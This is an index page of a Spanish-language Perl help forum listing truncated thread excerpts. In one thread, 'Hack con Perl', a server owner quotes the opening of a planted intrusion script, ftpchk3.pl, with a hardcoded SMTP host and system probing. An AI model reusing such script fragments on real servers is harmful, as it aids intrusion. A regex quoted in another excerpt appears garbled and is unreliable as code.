• Publicidad

Fecha actual 2024-11-28 23:44 @030

News News of Mundo Perl

Site map of Mundo Perl » Foro : Mundo Perl

Comparar archivos por fecha

Hola, ¿qué tal?

Me dirijo a ustedes en busca de ayuda.

Tengo una aplicación con la que accedo a un directorio y me fijo los archivos .txt que hay, y me los traigo.

Lo que necesito es que me los devuelva ordenados por fecha de creación.

Espero su ayuda..
gracias.

Acá les dejo el código actual, así se entiende un poco más.

#Abrimos el directorio

my $dir = '\Desktop\Archivostxt/';

opendir(DIR, $dir) or die $!; ...
Read more : Comparar archivos por fecha | Vistas : 2593 | Respuestas : 11 | Foro : Básico

Sustitución dentro de un fichero con Perl

Hola a todos,
A ver si me podéis echar una mano con esto... (me imagino que para los gurús del Perl les será bastante sencillo).

Tengo un fichero el cual contiene x líneas. Y quiero sustituir por cada línea del fichero el literal ";&;" por este otro "; ;".

Imaginemos que mi fichero se llama prueba.txt. Esto es lo que hago:

my $comando = "cat prueba.txt | ";

sustituye($comando);

sub sustituye{

my $file = shift; ...
Read more : Sustitución dentro de un fichero con Perl | Vistas : 1440 | Respuestas : 1 | Foro : Avanzado

Usando slash y backslash en regex

Hola.

Tengo un string lleno escapes sin "escapar" y necesito "escaparlos":

my %escapes = (
'\t' => "\t",
'\r' => "\r",
'\n' => "\n",
'\a' => "\a"
);

my $string = '\aHola\n\tDOS EOL\r\n';
foreach my $escape ( keys %escapes ) {
my $final = $escapes{$escape};
$string =~ s/\Q$escapes\E/$final/g;
}
say $string;

Eso funciona muy bien, pero resulta que si tengo 'america\\argentina' (por decir algo) surgen problemas con la regexp.

¿Cómo trabajo los backslash, slash y ...
Read more : Usando slash y backslash en regex | Vistas : 2196 | Respuestas : 3 | Foro : Intermedio

Extracción datos de web

Hola, soy nuevo en esto pero necesito sacar de un sitio web público ciertos datos de las páginas y ordenarlos en una hoja Excel, por ejemplo. El sitio es: http://www.protecnet.go.cr/InsumoSys/Principal.htm

En la consulta por plaguicidas y coadyuvantes obtengo toda la lista de unos 2876 registros de los cuales me interesa sacar los datos (por ejemplo éstos que corresponden al primer registro) y así que el programa me extraiga esos ...
Read more : Extracción datos de web | Vistas : 3735 | Respuestas : 3 | Foro : Intermedio

Hack con Perl

Estimados foreros,

No quiero molestar con esta consulta pero no encuentro forma de bloquear el continuo hackeo a mi servidor.

Cada vez que entran encuentro un archivo en Perl de nombre ftpchk3.pl
y que contiene esto:

#!/usr/bin/perl -w

$| = 1;

my $smtp = 'smtp.mail.ru';
my $dns = '208.67.222.222';

print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

#print "System info\n";
#print "-----------\n\n";
#print "$^O";
#print "\n", `uname -a` if $^O !~ /win/i;
#print "\n\n";

#print "Perl modules\n"; ...
Read more : Hack con Perl | Vistas : 3722 | Respuestas : 4 | Foro : Avanzado

Determinar el peso de varios archivos dentro de un dir.

Necesito detectar en un directorio los archivos que superan cierta cantidad de kb. y con ellos armar un informe.

¿Hay alguna función que me devuelva el peso del archivo?

Muchas gracias :)
Read more : Determinar el peso de varios archivos dentro de un dir. | Vistas : 1623 | Respuestas : 3 | Foro : Intermedio

EMBOSS

HOLA:

Estoy trabajando con un fichero en formato fasta del que tengo que extraer los ORF posibles de dicho fichero por los posibles marcos de lectura. Mi problema es que obtengo las secuencias pero al compararlo con el programa getorf veo que me faltan la última secuencia con su cabecera de la cadena normal y de la inversa.
No sé que hacer para que salga ya que aunque supongo que es un error de contadores ...
Read more : EMBOSS | Vistas : 1616 | Respuestas : 1 | Foro : Bioinformática

No funciona Timeout en Sockets

Hola

Bueno, intentando aprender más sobre Perl, intenté hacer un "Proxy Checker" más rápido que los que hay en Internet.

¡Y qué mejor que ocupar Socket! LWP/request, Agent, me parecen buenos, pero no sé si será una noción personal pero se demoran más que los Sockets.

Bueno, el código en sí funciona perfecto, cuando un proxy funciona, éste no se demora más de 2 o 3 segundos en informarte que el proxy funciona, perooo...

Cuando ...
Read more : No funciona Timeout en Sockets | Vistas : 1079 | Respuestas : 1 | Foro : Intermedio

Acceder a directorio

hola, ¿qué tal? Soy nuevo en Perl y me encargaron un trabajo en el que tengo que ver qué archivos hay dentro de un directorio. Quería saber si me pueden ayudar a resolver esto.

Muchas gracias.
Saludos.
Read more : Acceder a directorio | Vistas : 793 | Respuestas : 3 | Foro : Básico

Duda sobre macheo

Muy buenas,
Desde hace muy poquito me he puesto a aprender y a hacer cositas con Perl y me he encontrado con esta duda que os paso a explicar a continuación (a ver si soy capaz de escribirla)...

- Yo voy leyendo de un directorio una serie de ficheros de log.

- De esos ficheros me interesa coger cierta información por lo que decido hacer el famoso m// (adjunto macheo completo)

if (m/\"\\".+nodeName\=(+).*\&mnn\=(+).+\&msisdn\=(+).*\&HTTP_USER_AGENT\=(+).+JSESSIONID\=+\"\s+\"+\"\s+\"(+)/);

Una vez ...
Read more : Duda sobre macheo | Vistas : 2749 | Respuestas : 4 | Foro : Avanzado

Identificarte  •  Registrarse

Estadísticas

Mensajes totales 36882 • Temas totales 7430 • Usuarios totales 1981